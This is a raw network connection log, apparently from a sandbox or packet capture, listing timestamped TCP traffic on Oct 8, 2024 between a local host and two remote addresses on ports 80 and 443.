Oct 8, 2024 20:47:40.397574902 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.397732973 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.426069021 CEST	443	49876	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:40.426155090 CEST	443	49876	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:40.426220894 CEST	49876	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:40.426382065 CEST	49876	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:40.426414967 CEST	443	49876	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:40.426440001 CEST	49876	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:40.426457882 CEST	443	49876	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:40.429305077 CEST	49881	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:40.429387093 CEST	443	49881	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:40.429475069 CEST	49881	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:40.429641962 CEST	49881	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:40.429681063 CEST	443	49881	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:40.449650049 CEST	443	49878	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:40.450337887 CEST	49878	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:40.450395107 CEST	443	49878	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:40.450810909 CEST	49878	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:40.450828075 CEST	443	49878	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:40.476545095 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.476599932 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.476624012 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.476633072 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.476651907 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.476667881 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.476686001 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.476725101 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.478271008 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.478326082 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.478332996 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.478358030 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.478380919 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.478414059 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.478445053 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.478477955 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.478497028 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.478511095 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.478543997 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.478574991 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.478576899 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.478612900 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.478636980 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.478847980 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.478879929 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.478907108 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.478914976 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.478933096 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.478950024 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.478967905 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.479007959 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.484412909 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.484464884 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.484478951 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.484517097 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.484529972 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.484569073 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.484601021 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.484615088 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.484615088 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.484635115 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.484652042 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.484674931 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.484687090 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.484720945 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.484736919 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.484754086 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.484785080 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.484788895 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.484822035 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.484822989 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.484841108 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.484859943 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.484869003 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.484891891 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.484922886 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.484949112 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.484956980 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.484986067 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.485007048 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.485009909 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.485039949 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.485074997 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.485088110 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.485114098 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.485127926 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.485132933 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.485162973 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.485182047 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.485194921 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.485219002 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.485229969 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.485254049 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.485265970 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.485285997 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.485301018 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.485307932 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.485332966 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.485356092 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.485367060 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.485383987 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.485399961 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.485481024 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.485500097 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.485513926 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.485536098 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.485547066 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.485564947 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.485599995 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.485600948 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.485635042 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.485649109 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.485667944 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.485702038 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.485723972 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.485765934 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.485769033 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.485801935 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.485825062 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.485853910 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.485857010 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.485886097 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.485908985 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.485920906 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.485946894 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.485953093 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.485969067 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.485989094 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.486008883 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.486044884 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.486246109 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.486278057 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.486308098 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.486310005 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.486325979 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.486342907 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.486361027 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.486380100 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.486397982 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.486426115 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.486437082 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.486459970 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.486475945 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.486493111 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.486511946 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.486525059 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.486536026 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.486557961 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.486573935 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.486591101 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.486605883 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.486660957 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.486712933 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.486716986 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.486746073 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.486767054 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.486802101 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.486829996 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.486861944 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.486888885 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.486895084 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.486918926 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.486928940 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.486952066 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.486980915 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.486989021 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.487013102 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.487037897 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.487045050 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.487061024 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.487078905 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.487099886 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.487111092 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.487133026 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.487144947 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.487173080 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.487180948 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.487219095 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.487236023 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.487273932 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.488065004 CEST	443	49879	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:40.488384008 CEST	443	49877	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:40.488481045 CEST	49879	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:40.488503933 CEST	443	49879	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:40.488713026 CEST	49877	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:40.488738060 CEST	443	49877	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:40.488878965 CEST	49879	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:40.488888979 CEST	443	49879	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:40.489233971 CEST	49877	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:40.489247084 CEST	443	49877	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:40.491482019 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.491514921 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.491547108 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.491552114 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.491564989 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.491604090 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.491619110 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.491669893 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.491672039 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.491703987 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.491730928 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.491738081 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.491767883 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.491770983 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.491792917 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.491821051 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.491825104 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.491854906 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.491871119 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.491905928 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.491906881 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.491940022 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.491957903 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.491972923 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.491986990 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.492007017 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.492022038 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.492044926 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.492057085 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.492094994 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.518250942 CEST	443	49880	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:40.518553972 CEST	49880	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:40.518580914 CEST	443	49880	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:40.518887043 CEST	49880	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:40.518901110 CEST	443	49880	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:40.550610065 CEST	443	49878	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:40.551198959 CEST	443	49878	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:40.551284075 CEST	49878	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:40.551347971 CEST	49878	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:40.551347971 CEST	49878	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:40.551413059 CEST	443	49878	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:40.551438093 CEST	443	49878	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:40.554080963 CEST	49882	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:40.554137945 CEST	443	49882	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:40.554357052 CEST	49882	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:40.554485083 CEST	49882	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:40.554508924 CEST	443	49882	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:40.567472935 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.567526102 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.567568064 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.567576885 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.567589998 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.567610979 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.567636967 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.567643881 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.567660093 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.567678928 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.567712069 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.567743063 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.567748070 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.567774057 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.567795992 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.567858934 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.567889929 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.567924023 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.567958117 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.567969084 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.567969084 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.567991972 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.568006039 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.568025112 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.568048954 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.568070889 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.568084002 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.568099976 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.568130016 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.568147898 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.571186066 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.571257114 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.571554899 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.571588039 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.571616888 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.571623087 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.571635008 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.571656942 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.571672916 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.571712971 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.572125912 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.572176933 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.572185993 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.572227955 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.572228909 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.572261095 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.572290897 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.572294950 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.572314024 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.572328091 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.572361946 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.572382927 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.572393894 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.572407961 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.572429895 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.572448969 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.572462082 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.572483063 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.572520018 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.577020884 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.577084064 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.577111959 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.577143908 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.577171087 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.577178955 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.577193022 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.577234030 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.577280998 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.577313900 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.577341080 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.577361107 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.577414036 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.577466011 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.577497959 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.577524900 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.577549934 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.577553988 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.577583075 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.577615976 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.577636957 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.577651024 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.577678919 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.577686071 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.577703953 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.577718973 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.577750921 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.577778101 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.577778101 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.577783108 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.577806950 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.577824116 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.577838898 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.577874899 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.577907085 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.577917099 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.577938080 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.577939034 CEST	80	49875	147.45.44.104	192.168.2.5
